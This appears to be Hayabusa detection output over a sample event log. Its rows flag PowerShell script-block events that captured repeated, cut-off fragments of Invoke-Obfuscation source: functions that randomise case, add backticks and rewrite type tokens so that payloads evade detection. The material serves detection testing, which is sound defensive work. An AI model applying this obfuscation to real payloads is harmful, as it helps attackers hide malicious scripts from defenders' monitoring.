{ <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet 